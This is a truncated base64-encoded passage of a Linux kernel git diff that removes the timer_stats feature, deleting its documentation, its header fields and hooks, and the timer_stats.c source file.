W4gYmUgZW5hYmxlZCBieSBDT05GSUdfVElNRVJfU1RBVFMgaW4gdGhlICJLZXJuZWwgaGFja2luZyIgY29uZmlndXJhdGlvbgotc2VjdGlvbi4KLQotdGltZXJfc3RhdHMgY29sbGVjdHMgaW5mb3JtYXRpb24gYWJvdXQgdGhlIHRpbWVyIGV2ZW50cyB3aGljaCBhcmUgZmlyZWQgaW4gYQotTGludXggc3lzdGVtIG92ZXIgYSBzYW1wbGUgcGVyaW9kOgotCi0tIHRoZSBwaWQgb2YgdGhlIHRhc2socHJvY2Vzcykgd2hpY2ggaW5pdGlhbGl6ZWQgdGhlIHRpbWVyCi0tIHRoZSBuYW1lIG9mIHRoZSBwcm9jZXNzIHdoaWNoIGluaXRpYWxpemVkIHRoZSB0aW1lcgotLSB0aGUgZnVuY3Rpb24gd2hlcmUgdGhlIHRpbWVyIHdhcyBpbml0aWFsaXplZAotLSB0aGUgY2FsbGJhY2sgZnVuY3Rpb24gd2hpY2ggaXMgYXNzb2NpYXRlZCB0byB0aGUgdGltZXIKLS0gdGhlIG51bWJlciBvZiBldmVudHMgKGNhbGxiYWNrcykKLQotdGltZXJfc3RhdHMgYWRkcyBhbiBlbnRyeSB0byAvcHJvYzogL3Byb2MvdGltZXJfc3RhdHMKLQotVGhpcyBlbnRyeSBpcyB1c2VkIHRvIGNvbnRyb2wgdGhlIHN0YXRpc3RpY3MgZnVuY3Rpb25hbGl0eSBhbmQgdG8gcmVhZCBvdXQgdGhlCi1zYW1wbGVkIGluZm9ybWF0aW9uLgotCi1UaGUgdGltZXJfc3RhdHMgZnVuY3Rpb25hbGl0eSBpcyBpbmFjdGl2ZSBvbiBib290dXAuCi0KLVRvIGFjdGl2YXRlIGEgc2FtcGxlIHBlcmlvZCBpc3N1ZToKLSMgZWNobyAxID4vcHJvYy90aW1lcl9zdGF0cwotCi1UbyBzdG9wIGEgc2FtcGxlIHBlcmlvZCBpc3N1ZToKLSMgZWNobyAwID4vcHJvYy90aW1lcl9zdGF0cwotCi1UaGUgc3RhdGlzdGljcyBjYW4gYmUgcmV0cmlldmVkIGJ5OgotIyBjYXQgL3Byb2MvdGltZXJfc3RhdHMKLQotVGhlIHJlYWRvdXQgb2YgL3Byb2MvdGltZXJfc3RhdHMgYXV0b21hdGljYWxseSBkaXNhYmxlcyBzYW1wbGluZy4gVGhlIHNhbXBsZWQKLWluZm9ybWF0aW9uIGlzIGtlcHQgdW50aWwgYSBuZXcgc2FtcGxlIHBlcmlvZCBpcyBzdGFydGVkLiBUaGlzIGFsbG93cyBtdWx0aXBsZQotcmVhZG91dHMuCi0KLVNhbXBsZSBvdXRwdXQgb2YgL3Byb2MvdGltZXJfc3RhdHM6Ci0KLVRpbWVyc3RhdHMgc2FtcGxlIHBlcmlvZDogMy44ODg3NzAgcwotICAxMiwgICAgIDAgc3dhcHBlciAgICAgICAgICBocnRpbWVyX3N0b3Bfc2NoZWRfdGljayAoaHJ0aW1lcl9zY2hlZF90aWNrKQotICAxNSwgICAgIDEgc3dhcHBlciAgICAgICAgICBoY2Rfc3VibWl0X3VyYiAocmhfdGltZXJfZnVuYykKLSAgIDQsICAgOTU5IGtlZGFjICAgICAgICAgICAgc2NoZWR1bGVfdGltZW91dCAocHJvY2Vzc190aW1lb3V0KQotICAgMSwgICAgIDAgc3dhcHBlciAgICAgICAgICBwYWdlX3dyaXRlYmFja19pbml0ICh3Yl90aW1lcl9mbikKLSAgMjgsICAgICAwIHN3YXBwZXIgICAgICAgICAgaHJ0aW1lcl9zdG9wX3NjaGVkX3RpY2sgKGhydGltZXJfc2NoZWRfdGljaykKLSAgMjIsICAyOTQ4IElSUSA0ICAgICAgICAgICAgdHR5X2ZsaXBfYnVmZmVyX3B1c2ggKGRlbGF5ZWRfd29ya190aW1lcl9mbikKLSAgIDMsICAzMTAwIGJhc2ggICAgICAgICAgICAgc2NoZWR1bGVfdGltZW91dCAocHJvY2Vzc190aW1lb3V0KQotICAgMSwgICAgIDEgc3dhcHBlciAgICAgICAgICBxdWV1ZV9kZWxheWVkX3dvcmtfb24gKGRlbGF5ZWRfd29ya190aW1lcl9mbikKLSAgIDEsICAgICAxIHN3YXBwZXIgICAgICAgICAgcXVldWVfZGVsYXllZF93b3JrX29uIChkZWxheWVkX3dvcmtfdGltZXJfZm4pCi0gICAxLCAgICAgMSBzd2FwcGVyICAgICAgICAgIG5laWdoX3RhYmxlX2luaXRfbm9fbmV0bGluayAobmVpZ2hfcGVyaW9kaWNfdGltZXIpCi0gICAxLCAgMjI5MiBpcCAgICAgICAgICAgICAgIF9fbmV0ZGV2X3dhdGNoZG9nX3VwIChkZXZfd2F0Y2hkb2cpCi0gICAxLCAgICAyMyBldmVudHMvMSAgICAgICAgIGRvX2NhY2hlX2NsZWFuIChkZWxheWVkX3dvcmtfdGltZXJfZm4pCi05MCB0b3RhbCBldmVudHMsIDMwLjAgZXZlbnRzL3NlYwotCi1UaGUgZmlyc3QgY29sdW1uIGlzIHRoZSBudW1iZXIgb2YgZXZlbnRzLCB0aGUgc2Vjb25kIGNvbHVtbiB0aGUgcGlkLCB0aGUgdGhpcmQKLWNvbHVtbiBpcyB0aGUgbmFtZSBvZiB0aGUgcHJvY2Vzcy4gVGhlIGZvcnRoIGNvbHVtbiBzaG93cyB0aGUgZnVuY3Rpb24gd2hpY2gKLWluaXRpYWxpemVkIHRoZSB0aW1lciBhbmQgaW4gcGFyZW50aGVzaXMgdGhlIGNhbGxiYWNrIGZ1bmN0aW9uIHdoaWNoIHdhcwotZXhlY3V0ZWQgb24gZXhwaXJ5LgotCi0gICAgVGhvbWFzLCBJbmdvCi0KLUFkZGVkIGZsYWcgdG8gaW5kaWNhdGUgJ2RlZmVycmFibGUgdGltZXInIGluIC9wcm9jL3RpbWVyX3N0YXRzLiBBIGRlZmVycmFibGUKLXRpbWVyIHdpbGwgYXBwZWFyIGFzIGZvbGxvd3MKLSAgMTBELCAgICAgMSBzd2FwcGVyICAgICAgICAgIHF1ZXVlX2RlbGF5ZWRfd29ya19vbiAoZGVsYXllZF93b3JrX3RpbWVyX2ZuKQotCmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2hydGltZXIuaCBiL2luY2x1ZGUvbGludXgvaHJ0aW1lci5oCmluZGV4IDAzMDJiYmUuLjc2NWQ5ZTcgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvaHJ0aW1lci5oCisrKyBiL2luY2x1ZGUvbGludXgvaHJ0aW1lci5oCkBAIC05NiwxMiArOTYsNiBAQAogICogQGZ1bmN0aW9uOgl0aW1lciBleHBpcnkgY2FsbGJhY2sgZnVuY3Rpb24KICAqIEBiYXNlOglwb2ludGVyIHRvIHRoZSB0aW1lciBiYXNlIChwZXIgY3B1IGFuZCBwZXIgY2xvY2spCiAgKiBAc3RhdGU6CXN0YXRlIGluZm9ybWF0aW9uIChTZWUgYml0IHZhbHVlcyBhYm92ZSkKLSAqIEBzdGFydF9zaXRlOgl0aW1lciBzdGF0aXN0aWNzIGZpZWxkIHRvIHN0b3JlIHRoZSBzaXRlIHdoZXJlIHRoZSB0aW1lcgotICoJCXdhcyBzdGFydGVkCi0gKiBAc3RhcnRfY29tbTogdGltZXIgc3RhdGlzdGljcyBmaWVsZCB0byBzdG9yZSB0aGUgbmFtZSBvZiB0aGUgcHJvY2VzcyB3aGljaAotICoJCXN0YXJ0ZWQgdGhlIHRpbWVyCi0gKiBAc3RhcnRfcGlkOiB0aW1lciBzdGF0aXN0aWNzIGZpZWxkIHRvIHN0b3JlIHRoZSBwaWQgb2YgdGhlIHRhc2sgd2hpY2gKLSAqCQlzdGFydGVkIHRoZSB0aW1lcgogICoKICAqIFRoZSBocnRpbWVyIHN0cnVjdHVyZSBtdXN0IGJlIGluaXRpYWxpemVkIGJ5IGhydGltZXJfaW5pdCgpCiAgKi8KQEAgLTExMSwxMSArMTA1LDYgQEAKIAllbnVtIGhydGltZXJfcmVzdGFydAkJKCpmdW5jdGlvbikoc3RydWN0IGhydGltZXIgKik7CiAJc3RydWN0IGhydGltZXJfY2xvY2tfYmFzZQkqYmFzZTsKIAl1bnNpZ25lZCBsb25nCQkJc3RhdGU7Ci0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JaW50CQkJCXN0YXJ0X3BpZDsKLQl2b2lkCQkJCSpzdGFydF9zaXRlOwotCWNoYXIJCQkJc3RhcnRfY29tbVsxNl07Ci0jZW5kaWYKIH07CiAKIC8qKgpkaWZmIC0tZ2l0IGEvaW5jbHVkZS9saW51eC90aW1lci5oIGIvaW5jbHVkZS9saW51eC90aW1lci5oCmluZGV4IDhjNWExOTcuLjdjOGFkZmEgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvdGltZXIuaAorKysgYi9pbmNsdWRlL2xpbnV4L3RpbWVyLmgKQEAgLTIzLDExICsyMyw2IEBACiAKIAlpbnQgc2xhY2s7CiAKLSNpZmRlZiBDT05GSUdfVElNRVJfU1RBVFMKLQlpbnQgc3RhcnRfcGlkOwotCXZvaWQgKnN0YXJ0X3NpdGU7Ci0JY2hhciBzdGFydF9jb21tWzE2XTsKLSNlbmRpZgogI2lmZGVmIENPTkZJR19MT0NLREVQCiAJc3RydWN0IGxvY2tkZXBfbWFwIGxvY2tkZXBfbWFwOwogI2VuZGlmCkBAIC0xOTMsNDkgKzE4OCw2IEBACiAgKiBqaWZmaWUuCiAgKi8KIGV4dGVybiB1bnNpZ25lZCBsb25nIGdldF9uZXh0X3RpbWVyX2ludGVycnVwdCh1bnNpZ25lZCBsb25nIG5vdyk7Ci0KLS8qCi0gKiBUaW1lci1zdGF0aXN0aWNzIGluZm86Ci0gKi8KLSNpZmRlZiBDT05GSUdfVElNRVJfU1RBVFMKLQotZXh0ZXJuIGludCB0aW1lcl9zdGF0c19hY3RpdmU7Ci0KLSNkZWZpbmUgVElNRVJfU1RBVFNfRkxBR19ERUZFUlJBQkxFCTB4MQotCi1leHRlcm4gdm9pZCBpbml0X3RpbWVyX3N0YXRzKHZvaWQpOwotCi1leHRlcm4gdm9pZCB0aW1lcl9zdGF0c191cGRhdGVfc3RhdHModm9pZCAqdGltZXIsIHBpZF90IHBpZCwgdm9pZCAqc3RhcnRmLAotCQkJCSAgICAgdm9pZCAqdGltZXJmLCBjaGFyICpjb21tLAotCQkJCSAgICAgdW5zaWduZWQgaW50IHRpbWVyX2ZsYWcpOwotCi1leHRlcm4gdm9pZCBfX3RpbWVyX3N0YXRzX3RpbWVyX3NldF9zdGFydF9pbmZvKHN0cnVjdCB0aW1lcl9saXN0ICp0aW1lciwKLQkJCQkJICAgICAgIHZvaWQgKmFkZHIpOwotCi1zdGF0aWMgaW5saW5lIHZvaWQgdGltZXJfc3RhdHNfdGltZXJfc2V0X3N0YXJ0X2luZm8oc3RydWN0IHRpbWVyX2xpc3QgKnRpbWVyKQotewotCWlmIChsaWtlbHkoIXRpbWVyX3N0YXRzX2FjdGl2ZSkpCi0JCXJldHVybjsKLQlfX3RpbWVyX3N0YXRzX3RpbWVyX3NldF9zdGFydF9pbmZvKHRpbWVyLCBfX2J1aWx0aW5fcmV0dXJuX2FkZHJlc3MoMCkpOwotfQotCi1zdGF0aWMgaW5saW5lIHZvaWQgdGltZXJfc3RhdHNfdGltZXJfY2xlYXJfc3RhcnRfaW5mbyhzdHJ1Y3QgdGltZXJfbGlzdCAqdGltZXIpCi17Ci0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotfQotI2Vsc2UKLXN0YXRpYyBpbmxpbmUgdm9pZCBpbml0X3RpbWVyX3N0YXRzKHZvaWQpCi17Ci19Ci0KLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c190aW1lcl9zZXRfc3RhcnRfaW5mbyhzdHJ1Y3QgdGltZXJfbGlzdCAqdGltZXIpCi17Ci19Ci0KLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c190aW1lcl9jbGVhcl9zdGFydF9pbmZvKHN0cnVjdCB0aW1lcl9saXN0ICp0aW1lcikKLXsKLX0KLSNlbmRpZgogCiBleHRlcm4gdm9pZCBhZGRfdGltZXIoc3RydWN0IHRpbWVyX2xpc3QgKnRpbWVyKTsKIApkaWZmIC0tZ2l0IGEva2VybmVsL2hydGltZXIuYyBiL2tlcm5lbC9ocnRpbWVyLmMKaW5kZXggNDcwNjdkZS4uYzljM2E2YyAxMDA2NDQKLS0tIGEva2VybmVsL2hydGltZXIuYworKysgYi9rZXJuZWwvaHJ0aW1lci5jCkBAIC04MjcsMzQgKzgyNyw2IEBACiAJY2xvY2tfd2FzX3NldF9kZWxheWVkKCk7CiB9CiAKLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c19ocnRpbWVyX3NldF9zdGFydF9pbmZvKHN0cnVjdCBocnRpbWVyICp0aW1lcikKLXsKLSNpZmRlZiBDT05GSUdfVElNRVJfU1RBVFMKLQlpZiAodGltZXItPnN0YXJ0X3NpdGUpCi0JCXJldHVybjsKLQl0aW1lci0+c3RhcnRfc2l0ZSA9IF9fYnVpbHRpbl9yZXR1cm5fYWRkcmVzcygwKTsKLQltZW1jcHkodGltZXItPnN0YXJ0X2NvbW0sIGN1cnJlbnQtPmNvbW0sIFRBU0tfQ09NTV9MRU4pOwotCXRpbWVyLT5zdGFydF9waWQgPSBjdXJyZW50LT5waWQ7Ci0jZW5kaWYKLX0KLQotc3RhdGljIGlubGluZSB2b2lkIHRpbWVyX3N0YXRzX2hydGltZXJfY2xlYXJfc3RhcnRfaW5mbyhzdHJ1Y3QgaHJ0aW1lciAqdGltZXIpCi17Ci0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotI2VuZGlmCi19Ci0KLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c19hY2NvdW50X2hydGltZXIoc3RydWN0IGhydGltZXIgKnRpbWVyKQotewotI2lmZGVmIENPTkZJR19USU1FUl9TVEFUUwotCWlmIChsaWtlbHkoIXRpbWVyX3N0YXRzX2FjdGl2ZSkpCi0JCXJldHVybjsKLQl0aW1lcl9zdGF0c191cGRhdGVfc3RhdHModGltZXIsIHRpbWVyLT5zdGFydF9waWQsIHRpbWVyLT5zdGFydF9zaXRlLAotCQkJCSB0aW1lci0+ZnVuY3Rpb24sIHRpbWVyLT5zdGFydF9jb21tLCAwKTsKLSNlbmRpZgotfQotCiAvKgogICogQ291bnRlcnBhcnQgdG8gbG9ja19ocnRpbWVyX2Jhc2UgYWJvdmU6CiAgKi8KQEAgLTk4OCw3ICs5NjAsNiBAQAogCQkgKiByYXJlIGNhc2UgYW5kIGxlc3MgZXhwZW5zaXZlIHRoYW4gYSBzbXAgY2FsbC4KIAkJICovCiAJCWRlYnVnX2RlYWN0aXZhdGUodGltZXIpOwotCQl0aW1lcl9zdGF0c19ocnRpbWVyX2NsZWFyX3N0YXJ0X2luZm8odGltZXIpOwogCQlyZXByb2dyYW0gPSBiYXNlLT5jcHVfYmFzZSA9PSAmX19nZXRfY3B1X3ZhcihocnRpbWVyX2Jhc2VzKTsKIAkJLyoKIAkJICogV2UgbXVzdCBwcmVzZXJ2ZSB0aGUgQ0FMTEJBQ0sgc3RhdGUgZmxhZyBoZXJlLApAQCAtMTAzMyw4ICsxMDA0LDYgQEAKIAogCS8qIFN3aXRjaCB0aGUgdGltZXIgYmFzZSwgaWYgbmVjZXNzYXJ5OiAqLwogCW5ld19iYXNlID0gc3dpdGNoX2hydGltZXJfYmFzZSh0aW1lciwgYmFzZSwgbW9kZSAmIEhSVElNRVJfTU9ERV9QSU5ORUQpOwotCi0JdGltZXJfc3RhdHNfaHJ0aW1lcl9zZXRfc3RhcnRfaW5mbyh0aW1lcik7CiAKIAlsZWZ0bW9zdCA9IGVucXVldWVfaHJ0aW1lcih0aW1lciwgbmV3X2Jhc2UpOwogCkBAIC0xMjExLDEyICsxMTgwLDYgQEAKIAliYXNlID0gaHJ0aW1lcl9jbG9ja2lkX3RvX2Jhc2UoY2xvY2tfaWQpOwogCXRpbWVyLT5iYXNlID0gJmNwdV9iYXNlLT5jbG9ja19iYXNlW2Jhc2VdOwogCXRpbWVycXVldWVfaW5pdCgmdGltZXItPm5vZGUpOwotCi0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotCXRpbWVyLT5zdGFydF9waWQgPSAtMTsKLQltZW1zZXQodGltZXItPnN0YXJ0X2NvbW0sIDAsIFRBU0tfQ09NTV9MRU4pOwotI2VuZGlmCiB9CiAKIC8qKgpAQCAtMTI2NCw3ICsxMjI3LDYgQEAKIAogCWRlYnVnX2RlYWN0aXZhdGUodGltZXIpOwogCV9fcmVtb3ZlX2hydGltZXIodGltZXIsIGJhc2UsIEhSVElNRVJfU1RBVEVfQ0FMTEJBQ0ssIDApOwotCXRpbWVyX3N0YXRzX2FjY291bnRfaHJ0aW1lcih0aW1lcik7CiAJZm4gPSB0aW1lci0+ZnVuY3Rpb247CiAKIAkvKgpkaWZmIC0tZ2l0IGEva2VybmVsL3RpbWUvTWFrZWZpbGUgYi9rZXJuZWwvdGltZS9NYWtlZmlsZQppbmRleCBhYTkxYWY1Li5mZDg3ZTUxIDEwMDY0NAotLS0gYS9rZXJuZWwvdGltZS9NYWtlZmlsZQorKysgYi9rZXJuZWwvdGltZS9NYWtlZmlsZQpAQCAtNyw0ICs3LDMgQEAKIG9iai0kKENPTkZJR19HRU5FUklDX1NDSEVEX0NMT0NLKQkJKz0gc2NoZWRfY2xvY2subwogb2JqLSQoQ09ORklHX1RJQ0tfT05FU0hPVCkJCQkrPSB0aWNrLW9uZXNob3Qubwogb2JqLSQoQ09ORklHX1RJQ0tfT05FU0hPVCkJCQkrPSB0aWNrLXNjaGVkLm8KLW9iai0kKENPTkZJR19USU1FUl9TVEFUUykJCQkrPSB0aW1lcl9zdGF0cy5vCmRpZmYgLS1naXQgYS9rZXJuZWwvdGltZS90aW1lcl9saXN0LmMgYi9rZXJuZWwvdGltZS90aW1lcl9saXN0LmMKaW5kZXggNjFlZDg2Mi4uZjZhMTA0MyAxMDA2NDQKLS0tIGEva2VybmVsL3RpbWUvdGltZXJfbGlzdC5jCisrKyBiL2tlcm5lbC90aW1lL3RpbWVyX2xpc3QuYwpAQCAtNTcsMjEgKzU3LDExIEBACiBwcmludF90aW1lcihzdHJ1Y3Qgc2VxX2ZpbGUgKm0sIHN0cnVjdCBocnRpbWVyICp0YWRkciwgc3RydWN0IGhydGltZXIgKnRpbWVyLAogCSAgICBpbnQgaWR4LCB1NjQgbm93KQogewotI2lmZGVmIENPTkZJR19USU1FUl9TVEFUUwotCWNoYXIgdG1wW1RBU0tfQ09NTV9MRU4gKyAxXTsKLSNlbmRpZgogCVNFUV9wcmludGYobSwgIiAjJWQ6ICIsIGlkeCk7CiAJcHJpbnRfbmFtZV9vZmZzZXQobSwgdGFkZHIpOwogCVNFUV9wcmludGYobSwgIiwgIik7CiAJcHJpbnRfbmFtZV9vZmZzZXQobSwgdGltZXItPmZ1bmN0aW9uKTsKIAlTRVFfcHJpbnRmKG0sICIsIFM6JTAybHgiLCB0aW1lci0+c3RhdGUpOwotI2lmZGVmIENPTkZJR19USU1FUl9TVEFUUwotCVNFUV9wcmludGYobSwgIiwgIik7Ci0JcHJpbnRfbmFtZV9vZmZzZXQobSwgdGltZXItPnN0YXJ0X3NpdGUpOwotCW1lbWNweSh0bXAsIHRpbWVyLT5zdGFydF9jb21tLCBUQVNLX0NPTU1fTEVOKTsKLQl0bXBbVEFTS19DT01NX0xFTl0gPSAwOwotCVNFUV9wcmludGYobSwgIiwgJXMvJWQiLCB0bXAsIHRpbWVyLT5zdGFydF9waWQpOwotI2VuZGlmCiAJU0VRX3ByaW50ZihtLCAiXG4iKTsKIAlTRVFfcHJpbnRmKG0sICIgIyBleHBpcmVzIGF0ICVMdS0lTHUgbnNlY3MgW2luICVMZCB0byAlTGQgbnNlY3NdXG4iLAogCQkodW5zaWduZWQgbG9uZyBsb25nKWt0aW1lX3RvX25zKGhydGltZXJfZ2V0X3NvZnRleHBpcmVzKHRpbWVyKSksCmRpZmYgLS1naXQgYS9rZXJuZWwvdGltZS90aW1lcl9zdGF0cy5jIGIva2VybmVsL3RpbWUvdGltZXJfc3RhdHMuYwpkZWxldGVkIGZpbGUgbW9kZSAxMDA2NDQKaW5kZXggMGI1MzdmMi4uMDAwMDAwMAotLS0gYS9rZXJuZWwvdGltZS90aW1lcl9zdGF0cy5jCisrKyAvZGV2L251bGwKQEAgLTEsNDI1ICswLDAgQEAKLS8qCi0gKiBrZXJuZWwvdGltZS90aW1lcl9zdGF0cy5jCi0gKgotICogQ29sbGVjdCB0aW1lciB1c2FnZSBzdGF0aXN0aWNzLgotICoKLSAqIENvcHlyaWdodChDKSAyMDA2LCBSZWQgSGF0LCBJbmMuLCBJbmdvIE1vbG5hcgotICogQ29weXJpZ2h0KEMpIDIwMDYgVGltZXN5cyBDb3JwLiwgVGhvbWFzIEdsZWl4bmVyIDx0Z2x4QHRpbWVzeXMuY29tPgotICoKLSAqIHRpbWVyX3N0YXRzIGlzIGJhc2VkIG9uIHRpbWVyX3RvcCwgYSBzaW1pbGFyIGZ1bmN0aW9uYWxpdHkgd2hpY2ggd2FzIHBhcnQgb2YKLSAqIENvbiBLb2xpdmFzIGR5bnRpY2sgcGF0Y2ggc2V0LiBJdCB3YXMgZGV2ZWxvcGVkIGJ5IERhbmllbCBQZXRyaW5pIGF0IHRoZQotICogSW5zdGl0dXRvIE5va2lhIGRlIFRlY25vbG9naWEgLSBJTmRUIC0gTWFuYXVzLiB0aW1lcl90b3AncyBkZXNpZ24gd2FzIGJhc2VkCi0gKiBvbiBkeW5hbWljIGFsbG9jYXRpb24gb2YgdGhlIHN0YXRpc3RpY3MgZW50cmllcyBhbmQgbGluZWFyIHNlYXJjaCBiYXNlZAotICogbG9va3VwIGNvbWJpbmVkIHdpdGggYSBnbG9iYWwgbG9jaywgcmF0aGVyIHRoYW4gdGhlIHN0YXRpYyBhcnJheSwgaGFzaAotICogYW5kIHBlci1DUFUgbG9ja2luZyB3aGljaCBpcyB1c2VkIGJ5IHRpbWVyX3N0YXRzLiBJdCB3YXMgd3JpdHRlbiBmb3IgdGhlCi0gKiBwcmUgaHJ0aW1lciBrZXJuZWwgY29kZSBhbmQgdGhlcmVmb3JlIGRpZCBub3QgdGFrZSBocnRpbWVycyBpbnRvIGFjY291bnQuCi0gKiBOZXZlcnRoZWxlc3MgaXQgcHJvdmlkZWQgdGhlIGJhc2UgZm9yIHRoZSB0aW1lcl9zdGF0cyBpbXBsZW1lbnRhdGlvbiBhbmQKLSAqIHdhcyBhIGhlbHBmdWwgc291cmNlIG9mIGluc3BpcmF0aW9uLiBLdWRvcyB0byBEYW5pZWwgYW5kIHRoZSBOb2tpYSBmb2xrcwotICogZm9yIHRoaXMgZWZmb3J0LgotICoKLSAqIHRpbWVyX3RvcC5jIGlzCi0gKglDb3B5cmlnaHQgKEMpIDIwMDUgSW5zdGl0dXRvIE5va2lhIGRlIFRlY25vbG9naWEgLSBJTmRUIC0gTWFuYXVzCi0gKglXcml0dGVuIGJ5IERhbmllbCBQZXRyaW5pIDxkLnBlbnNhdG9yQGdtYWlsLmNvbT4KLSAqCXRpbWVyX3RvcC5jIHdhcyByZWxlYXNlZCB1bmRlciB0aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UgdmVyc2lvbiAyCi0gKgotICogV2UgZXhwb3J0IHRoZSBhZGRyZXNzZXMgYW5kIGNvdW50aW5nIG9mIHRpbWVyIGZ1bmN0aW9ucyBiZWluZyBjYWxsZWQsCi0gKiB0aGUgcGlkIGFuZCBjbWRsaW5lIGZyb20gdGhlIG93bmVyIHByb2Nlc3MgaWYgYXBwbGljYWJsZS4KLSAqCi0gKiBTdGFydC9zdG9wIGRhdGEgY29sbGVjdGlvbjoKLSAqICMgZWNobyBbMXwwXSA+L3Byb2MvdGltZXJfc3RhdHMKLSAqCi0gKiBEaXNwbGF5IHRoZSBpbmZvcm1hdGlvbiBjb2xsZWN0ZWQgc28gZmFyOgotICogIyBjYXQgL3Byb2MvdGltZXJfc3RhdHMKLSAqCi0gKiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQotICogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSB2ZXJzaW9uIDIgYXMKLSAqIHB1Ymxpc2hlZCBieSB0aGUgRnJlZSBTb2Z0d2FyZSBGb3VuZGF0aW9uLgotICovCi0KLSNpbmNsdWRlIDxsaW51eC9wcm9jX2ZzLmg+Ci0jaW5jbHVkZSA8bGludXgvbW9kdWxlLmg+Ci0jaW5jbHVkZSA8bGludXgvc3BpbmxvY2suaD4KLSNpbmNsdWRlIDxsaW51eC9zY2hlZC5oPgotI2luY2x1ZGUgPGxpbnV4L3NlcV9maWxlLmg+Ci0jaW5jbHVkZSA8bGludXgva2FsbHN5bXMuaD4KLQotI2luY2x1ZGUgPGFzbS91YWNjZXNzLmg+Ci0KLS8qCi0gKiBUaGlzIGlzIG91ciBiYXNpYyB1bml0IG9mIGludGVyZXN0OiBhIHRpbWVyIGV4cGlyeSBldmVudCBpZGVudGlmaWVkCi0gKiBieSB0aGUgdGltZXIsIGl0cyBzdGFydC9leHBpcmUgZnVuY3Rpb25zIGFuZCB0aGUgUElEIG9mIHRoZSB0YXNrIHRoYXQKLSAqIHN0YXJ0ZWQgdGhlIHRpbWVyLiBXZSBjb3VudCB0aGUgbnVtYmVyIG9mIHRpbWVzIGFuIGV2ZW50IGhhcHBlbnM6Ci0gKi8KLXN0cnVjdCBlbnRyeSB7Ci0JLyoKLQkgKiBIYXNoIGxpc3Q6Ci0JICovCi0Jc3RydWN0IGVudHJ5CQkqbmV4dDsKLQotCS8qCi0JICogSGFzaCBrZXlzOgotCSAqLwotCXZvaWQJCQkqdGltZXI7Ci0Jdm9pZAkJCSpzdGFydF9mdW5jOwotCXZvaWQJCQkqZXhwaXJlX2Z1bmM7Ci0JcGlkX3QJCQlwaWQ7Ci0KLQkvKgotCSAqIE51bWJlciBvZiB0aW1lb3V0IGV2ZW50czoKLQkgKi8KLQl1bnNpZ25lZCBsb25nCQljb3VudDsKLQl1bnNpZ25lZCBpbnQJCXRpbWVyX2ZsYWc7Ci0KLQkvKgotCSAqIFdlIHNhdmUgdGhlIGNvbW1hbmQtbGluZSBzdHJpbmcgdG8gcHJlc2VydmUKLQkgKiB0aGlzIGluZm9ybWF0aW9uIHBhc3QgdGFzayBleGl0OgotCSAqLwotCWNoYXIJCQljb21tW1RBU0tfQ09NTV9MRU4gKyAxXTsKLQotfSBfX19fY2FjaGVsaW5lX2FsaWduZWRfaW5fc21wOwotCi0vKgotICogU3BpbmxvY2sgcHJvdGVjdGluZyB0aGUgdGFibGVzIC0gbm90IHRha2VuIGR1cmluZyBsb29rdXA6Ci0gKi8KLXN0YXRpYyBERUZJTkVfUkFXX1NQSU5MT0NLKHRhYmxlX2xvY2spOwotCi0vKgotICogUGVyLUNQVSBsb29rdXAgbG9ja3MgZm9yIGZhc3QgaGFzaCBsb29rdXA6Ci0gKi8KLXN0YXRpYyBERUZJTkVfUEVSX0NQVShyYXdfc3BpbmxvY2tfdCwgdHN0YXRzX2xvb2t1cF9sb2NrKTsKLQotLyoKLSAqIE11dGV4IHRvIHNlcmlhbGl6ZSBzdGF0ZSBjaGFuZ2VzIHdpdGggc2hvdy1zdGF0cyBhY3Rpdml0aWVzOgotICovCi1zdGF0aWMgREVGSU5FX01VVEVYKHNob3dfbXV0ZXgpOwotCi0vKgotICogQ29sbGVjdGlvbiBzdGF0dXMsIGFjdGl2ZS9pbmFjdGl2ZToKLSAqLwotaW50IF9fcmVhZF9tb3N0bHkgdGltZXJfc3RhdHNfYWN0aXZlOwotCi0vKgotICogQmVnaW5uaW5nL2VuZCB0aW1lc3RhbXBzIG9mIG1lYXN1cmVtZW50OgotICovCi1zdGF0aWMga3RpbWVfdCB0aW1lX3N0YXJ0LCB0aW1lX3N0b3A7Ci0KLS8qCi0gKiB0c3RhdCBlbnRyeSBzdHJ1Y3RzIG9ubHkgZ2V0IGFsbG9jYXRlZCB3aGlsZSBjb2xsZWN0aW9uIGlzCi0gKiBhY3RpdmUgYW5kIG5ldmVyIGZyZWVkIGR1cmluZyB0aGF0IHRpbWUgLSB0aGlzIHNpbXBsaWZpZXMKLSAqIHRoaW5ncyBxdWl0ZSBhIGJpdC4KLSAqCi0gKiBUaGV5IGdldCBmcmVlZCB3aGVuIGEgbmV3IGNvbGxlY3Rpb24gcGVyaW9kIGlzIHN0YXJ0ZWQuCi0gKi8KLSNkZWZpbmUgTUFYX0VOVFJJRVNfQklUUwkxMAotI2RlZmluZSBNQVhfRU5UUklFUwkJKDFVTCA8PCBNQVhfRU5UUklFU19CSVRTKQotCi1zdGF0aWMgdW5zaWduZWQgbG9uZyBucl9lbnRyaWVzOwotc3RhdGljIHN0cnVjdCBlbnRyeSBlbnRyaWVzW01BWF9FTlRSSUVTXTsKLQotc3RhdGljIGF0b21pY190IG92ZXJmbG93X2NvdW50OwotCi0vKgotICogVGhlIGVudHJpZXMgYXJlIGluIGEgaGFzaC10YWJsZSwgZm9yIGZhc3QgbG9va3VwOgotICovCi0jZGVmaW5lIFRTVEFUX0hBU0hfQklUUwkJKE1BWF9FTlRSSUVTX0JJVFMgLSAxKQotI2